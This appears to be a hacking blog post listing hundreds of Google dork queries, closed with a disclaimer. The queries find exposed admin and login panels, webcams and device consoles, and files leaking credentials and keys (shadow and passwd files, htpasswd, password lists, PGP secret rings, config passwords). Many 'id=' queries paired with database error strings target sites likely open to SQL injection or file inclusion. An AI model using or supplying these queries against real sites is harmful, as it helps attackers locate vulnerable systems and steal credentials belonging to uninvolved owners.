intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"remote assessment" OpenAanval Console
intitle:"Remote Desktop Web Connection"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"start.managing.the.device" remote pbx acc
intitle:"statistics of" "advanced web statistics"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"supervisioncam protocol"
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"
intitle:"switch login" "IBM Fast Ethernet Desktop"
intitle:"SWW link" "Please wait....."
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"System Statistics" +"System and Network Information Center"
intitle:"teamspeak server-administration
intitle:"Terminal Services Web Connection"
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"twiki" inurl:"TWikiUsers"
intitle:"Under construction" "does not currently have"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"Welcome to the Advanced Extranet Server, ADVX!"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"welcome.to.squeezebox"
intitle:"WJ-NT104 Main Page"
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:admin intitle:login
intitle:asterisk.management.portal web-access
intitle:axis intitle:"video server"
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:Configuration.File inurl:softcart.exe
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
intitle:ilohamail intext:"Version 0.8.10" "
intitle:IMP inurl:imp/index.php3
intitle:index.of "Apache" "server at"
intitle:index.of administrators.pwd
intitle:index.of cgiirc.config
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:Index.of etc shadow
intitle:Index.of etc shadow site:passwd
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:index.of master.passwd
intitle:index.of passwd passwd.bak
intitle:index.of people.lst
intitle:index.of trillian.ini
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
intitle:liveapplet
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:Ovislink inurl:private/login
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpnews.login
intitle:plesk inurl:login.php3
intitle:rapidshare intext:login


Special Inurl Dorks



inurl::2082/frontend -demo
inurl:":10000" intext:webmin
inurl:"/admin/configuration. php?" Mystore
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/axs/ax-admin.pl" -script
inurl:"/catalog.nsf" intitle:catalog
inurl:"/cricket/grapher.cgi"
inurl:"/NSearch/AdminServlet"
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:"8003/Display?what="
inurl:"Activex/default.htm" "Demo"
inurl:"auth_user_file.txt"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"calendar.asp?action=login"
inurl:"calendars?ri?t/users.txt"
inurl:"default/login.php" intitle:"kerio"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"gs/adminlogin.aspx"
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"index.php? module=ew_filemanager"
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"php121login.php"
inurl:"printer/main.html" intext:"settings"
inurl:"putty.reg"
inurl:"Sites.dat"+"PASS="
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"ViewerFrame?Mode="
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
inurl:"wvdial.conf" intext:"password"
inurl:"wwwroot/
inurl:*db filetype:mdb
inurl:/_layouts/settings
inurl:/*.php?id=
inurl:/adm-cfgedit.php
inurl:/admin/login.asp
inurl:/articles.php?id=
inurl:/calendar.php?token=
inurl:/careers-detail.asp?id=
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/cgi-bin/pass.txt
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/CollectionContent.asp?id=
inurl:/commodities.php?*id=
inurl:/Content.asp?id=
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:/dana-na/auth/welcome.html
inurl:/db/main.mdb
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/Details.asp?id=
inurl:/details.php?linkid=
inurl:/dosearch.asp?
inurl:/eprise/
inurl:/eventdetails.php?*=
inurl:/filedown.php?file=
inurl:/gallery.asp?cid=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
inurl:/imprimir.php?id=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/list_blogs.php?sort_mode=
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/mpfn=pdview&id=
inurl:/news.php?include=
inurl:/notizia.php?idArt=
inurl:/os_view_full.php?
inurl:/prodotti.php?id=
inurl:/publications.asp?type=
inurl:/recipe-view.php?id=
inurl:/reservations.php?id=
inurl:/shared/help.php?page=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/SUSAdmin intitle:"Microsoft Software Update Services"
inurl:/view/lang/index.php?page=?page=
inurl:/viewfaqs.php?cat=
inurl:/webedit.* intext:WebEdit Professional -html
inurl:/WhatNew.asp?page=&id=
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl:aboutbook.php?id=
inurl:access
inurl:act=
inurl:action=
inurl:admin filetype:db
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:administrator "welcome to mambo"
inurl:ages.php?id=
inurl:ajax.php?page=
inurl:announce.php?id=
inurl:aol*/_do/rss_popup?blogID=
inurl:API_HOME_DIR=
inurl:art.php?idm=
inurl:article.php?ID=
inurl:article.php?id=
inurl:artikelinfo.php?id=
inurl:asp
inurl:avd_start.php?avd=
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:backup filetype:mdb
inurl:band_info.php?id=
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:board=
inurl:build.err
inurl:buy
inurl:buy.php?category=
inurl:cat=
inurl:category.php?id=
inurl:ccbill filetype:log
inurl:cgi
inurl:cgi-bin inurl:calendar.cfg
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:cgiirc.config
inurl:changepassword.asp
inurl:channel_id=
inurl:chap-secrets -cvs
inurl:chappies.php?id=
inurl:Citrix/MetaFrame/default/default.aspx
inurl:clanek.php4?id=
inurl:client_id=
inurl:clubpage.php?id=
inurl:cmd=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:config.php dbuname dbpass
inurl:confixx inurl:login|anmeldung
inurl:cont=
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:csCreatePro.cgi
inurl:current_frame=
inurl:curriculum.php?id=
inurl:data
inurl:date=
inurl:declaration_more.php?decl_id=
inurl:default.asp intitle:"WebCommander"
inurl:detail.php?ID=
inurl:detail=
inurl:dir=
inurl:display=
inurl:download
inurl:download.php?id=
inurl:download=
inurl:downloads_info.php?id=
inurl:ds.py
inurl:email filetype:mdb
inurl:event.php?id=
inurl:exchweb/bin/auth/owalogon.asp
inurl:f=
inurl:faq2.php?id=
inurl:fcgi-bin/echo
inurl:fellows.php?id=
inurl:fiche_spectacle.php?id=
inurl:file
inurl:file=
inurl:fileinclude=
inurl:filename=
inurl:filezilla.xml -cvs
inurl:firm_id=
inurl:footer.inc.php
inurl:forum
inurl:forum filetype:mdb
inurl:forum_bds.php?num=
inurl:forward filetype:forward -cvs
inurl:g=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:getdata=
inurl:getmsg.html intitle:hotmail
inurl:gnatsweb.pl
inurl:go=
inurl:historialeer.php?num=
inurl:home
inurl:home.php?pagina=
inurl:hosting_info.php?id=
inurl:hp/device/this.LCDispatcher
inurl:HT=
inurl:html
inurl:htpasswd filetype:htpasswd
inurl:humor.php?id=
inurl:idd=
inurl:ids5web
inurl:iisadmin
inurl:inc
inurl:inc=
inurl:incfile=
inurl:incl=
inurl:include_file=
inurl:include_path=
inurl:index.cgi?aktion=shopview
inurl:index.php?=
inurl:index.php?conteudo=
inurl:index.php?id=
inurl:index.php?load=
inurl:index.php?opcao=
inurl:index.php?principal=
inurl:index.php?show=
inurl:index2.php?option=
inurl:index2.php?to=
inurl:indexFrame.shtml Axis
inurl:infile=
inurl:info
inurl:info.inc.php
inurl:info=
inurl:iniziativa.php?in=
inurl:ir=
inurl:irc filetype:cgi cgi:irc
inurl:item_id=
inurl:kategorie.php4?id=
inurl:labels.php?id=
inurl:lang=
inurl:language=
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:link=
inurl:list
inurl:load=
inurl:loadpsb.php?id=
inurl:log.nsf -gov
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.jsp.bak
inurl:login.php "SquirrelMail version"
inurl:look.php?ID=
inurl:mail
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:main.php?id=
inurl:main=
inurl:mainspot=
inurl:ManyServers.htm
inurl:material.php?id=
inurl:memberInfo.php?id=
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:midicart.mdb
inurl:msg=
inurl:names.nsf?opendatabase
inurl:netscape.hst
inurl:netscape.ini
inurl:netw_tcp.shtml
inurl:new
inurl:news_display.php?getid=
inurl:news_view.php?id=
inurl:news-full.php?id=
inurl:news.php?id=
inurl:newscat.php?id=
inurl:newsdesk.cgi? inurl:"t="
inurl:newsDetail.php?id=
inurl:newsid=
inurl:newsitem.php?num=
inurl:newsone.php?id=
inurl:newsticker_info.php?idn=
inurl:nuke filetype:sql
inurl:num=
inurl:ocw_login_username
inurl:odbc.ini ext:ini -cvs
inurl:offer.php?idf=
inurl:ogl_inet.php?ogl_id=
inurl:openfile=
inurl:opinions.php?id=
inurl:orasso.wwsso_app_admin.ls_login
inurl:order
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:ovcgi/jovw
inurl:p=
inurl:page.php?file=
inurl:page.php?id=
inurl:page=
inurl:pageid=
inurl:Pageid=
inurl:pages
inurl:pages.php?id=
inurl:pagina=
inurl:pap-secrets -cvs
inurl:participant.php?id=
inurl:pass.dat
inurl:passlist.txt
inurl:path_to_calendar=
inurl:path=
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:perl/printenv
inurl:person.php?id=
inurl:pg=
inurl:php.ini filetype:ini
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:play_old.php?id=
inurl:pls/admin_/gateway.htm
inurl:pop.php?id=
inurl:portscan.php "from Port"|"Port Range"
inurl:post.php?id=
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:preferences.ini "[emule]"
inurl:preview.php?id=
inurl:prod_detail.php?id=
inurl:prod_info.php?id=
inurl:product_ranges_view.php?ID=
inurl:product-item.php?id=
inurl:product.php?id=
inurl:product.php?mid=
inurl:productdetail.php?id=
inurl:productinfo.php?id=
inurl:Productinfo.php?id=
inurl:produit.php?id=
inurl:profile_view.php?id=
inurl:profiles filetype:mdb
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:Proxy.txt
inurl:public
inurl:publications.php?id=
inurl:qry_str=
inurl:ray.php?id=
inurl:read.php?=
inurl:read.php?id=
inurl:readnews.php?id=
inurl:reagir.php?num=
inurl:releases.php?id=
inurl:report "EVEREST Home Edition "
inurl:review.php?id=
inurl:rpSys.html
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:rubrika.php?idr=
inurl:ruta=
inurl:safehtml=
inurl:search
inurl:search.php vbulletin
inurl:search/admin.php
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:section.php?id=
inurl:section=
inurl:select_biblio.php?id=
inurl:sem.php3?id=
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:server.cfg rcon password
inurl:servlet/webacc
inurl:shop
inurl:shop_category.php?id=
inurl:shop.php?do=part&id=
inurl:shopdbtest.asp
inurl:shopping.php?id=
inurl:show_an.php?id=
inurl:show.php?id=
inurl:showfile=
inurl:showimg.php?id=
inurl:shredder-categories.php?id=
inurl:side=
inurl:site_id=
inurl:skin=
inurl:snitz_forums_2000.mdb
inurl:software
inurl:spr.php?id=
inurl:sql.php?id=
inurl:ssl.conf filetype:conf
inurl:staff_id=
inurl:static=
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:story.php?id=
inurl:str=
inurl:Stray-Questions-View.php?num=
inurl:strona=
inurl:sub=
inurl:support
inurl:sw_comment.php?id=
inurl:tdbin
inurl:tekst.php?idt=
inurl:testcgi xitami
inurl:textpattern/index.php
inurl:theme.php?id=
inurl:title.php?id=
inurl:top10.php?cat=
inurl:tradeCategory.php?id=
inurl:trainers.php?id=
inurl:transcript.php?id=
inurl:tresc=
inurl:url=
inurl:user
inurl:user=
inurl:vbstats.php "page generated"
inurl:ventrilo_srv.ini adminpassword
inurl:view_ad.php?id=
inurl:view_faq.php?id=
inurl:view_product.php?id=
inurl:view.php?id=
inurl:view/index.shtml
inurl:view/indexFrame.shtml
inurl:view/view.shtml
inurl:viewapp.php?id=
inurl:ViewerFrame?Mode=Refresh
inurl:viewphoto.php?id=
inurl:viewshowdetail.php?id=
inurl:vtund.conf intext:pass -cvs
inurl:vtund.conf intext:pass -cvs s
inurl:WCP_USER
inurl:web
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webmail./index.pl "Interface"
inurl:website.php?id=
inurl:webutil.pl
inurl:webvpn.html "login" "Please enter your"
inurl:webvpn.html "login" "Please enter your" Login ("admin account info") filetype:log
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
inurl:yapboz_detay.asp
inurl:yapboz_detay.asp + View Webcam User Accessing
inurl:zebra.conf intext:password -sample -test -tutorial -download

Disclaimer :
                    Use Of Google Dorks For Hacking Purpose is Completely Illegal. So, I, Me And My Blog Will Not Take Any Type Of Responsibility Of Any Illegial Activities. Use These Google Dorks On Your Own Risk. Here, I am Only Sharing My Knowledge With You. 



Written By:
                   SSB